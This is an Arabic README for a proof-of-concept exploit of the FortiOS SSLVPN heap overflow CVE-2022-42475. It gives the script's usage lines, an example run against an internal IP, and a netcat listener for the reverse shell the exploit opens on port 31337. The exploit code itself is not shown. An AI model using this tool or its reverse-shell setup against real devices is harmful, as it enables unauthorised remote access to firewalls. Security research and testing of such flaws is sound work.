
ثغرة تجاوز سعة المخزن المؤقت في FortiOS
https://nvd.nist.gov/vuln/detail/CVE-2022-42475 كود POC لاستغلال تجاوز سعة الكومة (Heap overflow) في خدمة SSLVPN الخاصة بـ Fortinet
هذا POC سريع وغير مُحكم، ولن يعمل على الأرجح في أي مكان إلا إذا كنت محظوظًا للغاية. يعتمد على الإصدار ويحتوي على بعض الإزاحات الثابتة (hardcoded offsets) التي من المرجح أن تتغير من نظام إلى آخر.
python3 cve-2022-42475.py rhost rport lhost 'command'
python3 cve-2022-42475.py 192.168.10.1 8443 10.10.1.1 'ls -la /'
يستخدم POC أمر بايثون لإعداد شل عكسي على المنفذ 31337
nc -lvnp 31337
هذا المشروع مصمم لأغراض تعليمية واختبار أخلاقي فقط. استخدام هذه الأداة لمهاجمة أهداف دون موافقة مسبقة متبادلة غير قانوني. المطورون لا يتحملون أي مسؤولية ولا يتحملون مسؤولية أي إساءة استخدام أو ضرر ناتج عن هذه الأداة.
شكر لـ Alain M - تويتر : @plopz0r